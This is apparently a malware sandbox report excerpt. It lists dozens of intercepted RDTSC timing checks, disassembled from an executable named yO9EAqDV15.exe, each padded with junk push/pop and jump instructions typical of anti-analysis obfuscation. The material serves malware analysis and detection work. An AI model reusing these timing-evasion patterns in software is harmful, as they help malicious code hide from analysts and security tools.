              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F0F7DD second address: F0F7F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E44h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F0F7F9 second address: F0F7FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F0F7FD second address: F0F801 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F0F97D second address: F0F985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F0F985 second address: F0F9A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F7F08BA1E3Fh 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e popad 0x0000000f push esi 0x00000010 push edi 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F0FEC8 second address: F0FED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7F08F64186h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F16497 second address: F164C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 jmp 00007F7F08BA1E43h 0x0000000b jnc 00007F7F08BA1E36h 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F7F08BA1E3Eh 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F164C7 second address: F164CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F16B50 second address: F16B58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F1ABCF second address: F1ABE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F7F08F64186h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F1ABE1 second address: F1ABFC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F7F08BA1E3Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e jne 00007F7F08BA1E36h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F1A3BD second address: F1A3C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F1A3C6 second address: F1A3CC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F1A3CC second address: F1A3D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F1A3D2 second address: F1A3EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F08BA1E48h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F1A91E second address: F1A924 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F1A924 second address: F1A928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F1A928 second address: F1A92C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F1A92C second address: F1A937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F2156D second address: F2159A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F7F08F64186h 0x0000000a popad 0x0000000b jng 00007F7F08F641A2h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F2159A second address: F215A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F215A0 second address: F215AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7F08F64186h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F215AA second address: F215B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F21722 second address: F21730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F21730 second address: F2175C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F7F08BA1E46h 0x0000000b popad 0x0000000c jc 00007F7F08BA1E3Ah 0x00000012 push edx 0x00000013 pop edx 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push esi 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F219B6 second address: F219BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F219BB second address: F219C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7F08BA1E36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F221E4 second address: F221F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F08F6418Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F22469 second address: F2246D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F2246D second address: F22471 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F22471 second address: F2247F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F2247F second address: F224B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08F64199h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F7F08F64199h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F2304F second address: F2305E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F7F08BA1E3Ah 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: F26B1B second address: F26B3A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7F08F64195h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56508E1 second address: 565091C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08F64199h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-04h], 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov bh, 7Ch 0x00000012 jmp 00007F7F08F64194h 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 565091C second address: 5650922 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5650922 second address: 5650932 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5650932 second address: 5650944 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 565099A second address: 56509D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08F6418Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a jmp 00007F7F08F64190h 0x0000000f leave 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7F08F64197h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56509D5 second address: 56509DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56509DB second address: 56509DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56509DF second address: 5640013 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b retn 0004h 0x0000000e nop 0x0000000f sub esp, 04h 0x00000012 xor ebx, ebx 0x00000014 cmp eax, 00000000h 0x00000017 je 00007F7F08BA1F9Ah 0x0000001d mov dword ptr [esp], 0000000Dh 0x00000024 call 00007F7F0D4FDFD1h 0x00000029 mov edi, edi 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e jmp 00007F7F08BA1E3Ah 0x00000033 mov dx, si 0x00000036 popad 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5640013 second address: 564003B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 43h 0x00000005 jmp 00007F7F08F64196h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f mov si, 751Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop edi 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 564003B second address: 564007E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7F08BA1E44h 0x00000008 and eax, 3C4E53A8h 0x0000000e jmp 00007F7F08BA1E3Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F7F08BA1E44h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 564007E second address: 56400DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08F6418Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c call 00007F7F08F64192h 0x00000011 pop eax 0x00000012 mov edi, 7364F926h 0x00000017 popad 0x00000018 mov ebx, 429781B2h 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 jmp 00007F7F08F64199h 0x00000025 sub esp, 2Ch 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F7F08F6418Dh 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56400DC second address: 56400F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56400F8 second address: 56400FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56400FC second address: 5640100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5640100 second address: 5640106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5640106 second address: 5640190 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7F08BA1E3Bh 0x0000000f xchg eax, ebx 0x00000010 jmp 00007F7F08BA1E46h 0x00000015 xchg eax, edi 0x00000016 jmp 00007F7F08BA1E40h 0x0000001b push eax 0x0000001c pushad 0x0000001d call 00007F7F08BA1E41h 0x00000022 mov edx, esi 0x00000024 pop ecx 0x00000025 call 00007F7F08BA1E3Dh 0x0000002a mov edi, ecx 0x0000002c pop ecx 0x0000002d popad 0x0000002e xchg eax, edi 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F7F08BA1E46h 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56401EF second address: 5640207 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08F64194h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 564032A second address: 5640330 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5640330 second address: 5640336 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5640336 second address: 5640351 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5640351 second address: 5640355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5640355 second address: 564035B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56403A4 second address: 56403C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08F64191h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c mov al, 02h 0x0000000e push eax 0x0000000f push edx 0x00000010 mov edi, 1BDAB83Ah 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56403C5 second address: 56403EB instructions: 0x00000000 rdtsc 0x00000002 movsx edi, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 jg 00007F7F7917FEF5h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7F08BA1E44h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56403EB second address: 56403EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56403EF second address: 56403F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56403F5 second address: 564040B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, DA43h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F7F08F641DCh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 564040B second address: 564040F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 564040F second address: 564041D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08F6418Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 564041D second address: 5640477 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-14h], edi 0x0000000c jmp 00007F7F08BA1E46h 0x00000011 jne 00007F7F7917FE8Ch 0x00000017 jmp 00007F7F08BA1E40h 0x0000001c mov ebx, dword ptr [ebp+08h] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F7F08BA1E47h 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5640477 second address: 564047D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 564047D second address: 56404BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-2Ch] 0x0000000e pushad 0x0000000f jmp 00007F7F08BA1E44h 0x00000014 popad 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F7F08BA1E43h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56404BD second address: 56404F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 pushfd 0x00000007 jmp 00007F7F08F64190h 0x0000000c xor cl, FFFFFFE8h 0x0000000f jmp 00007F7F08F6418Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov dword ptr [esp], esi 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov ecx, ebx 0x00000020 mov edi, 61F429E2h 0x00000025 popad 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56404F4 second address: 56404F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56404F9 second address: 5640537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, 0BEBh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F7F08F6418Eh 0x00000011 push eax 0x00000012 jmp 00007F7F08F6418Bh 0x00000017 nop 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F7F08F64195h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5640537 second address: 564053D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56405C0 second address: 56405C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56405C6 second address: 56405CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56405CA second address: 563067C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F7F79542209h 0x0000000e xor eax, eax 0x00000010 jmp 00007F7F08F3D8BAh 0x00000015 pop esi 0x00000016 pop edi 0x00000017 pop ebx 0x00000018 leave 0x00000019 retn 0004h 0x0000001c nop 0x0000001d sub esp, 04h 0x00000020 mov esi, eax 0x00000022 xor ebx, ebx 0x00000024 cmp esi, 00000000h 0x00000027 je 00007F7F08F642C5h 0x0000002d call 00007F7F0D8B081Fh 0x00000032 mov edi, edi 0x00000034 pushad 0x00000035 mov dx, cx 0x00000038 call 00007F7F08F6418Ch 0x0000003d movzx esi, dx 0x00000040 pop edi 0x00000041 popad 0x00000042 xchg eax, ebp 0x00000043 jmp 00007F7F08F6418Ah 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e popad 0x0000004f rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 563067C second address: 5630682 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5630682 second address: 5630698 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F08F64192h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5630698 second address: 56306CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08BA1E3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F7F08BA1E46h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 movsx edx, ax 0x00000019 mov eax, 3F7C83D5h 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56306CE second address: 56306D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56306D4 second address: 56306D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56306D8 second address: 56306E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov edi, ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e mov di, cx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56306E9 second address: 5630713 instructions: 0x00000000 rdtsc 0x00000002 call 00007F7F08BA1E3Ah 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7F08BA1E43h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5630713 second address: 5630719 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5630754 second address: 563075A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 563075A second address: 5630760 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5630760 second address: 5630764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
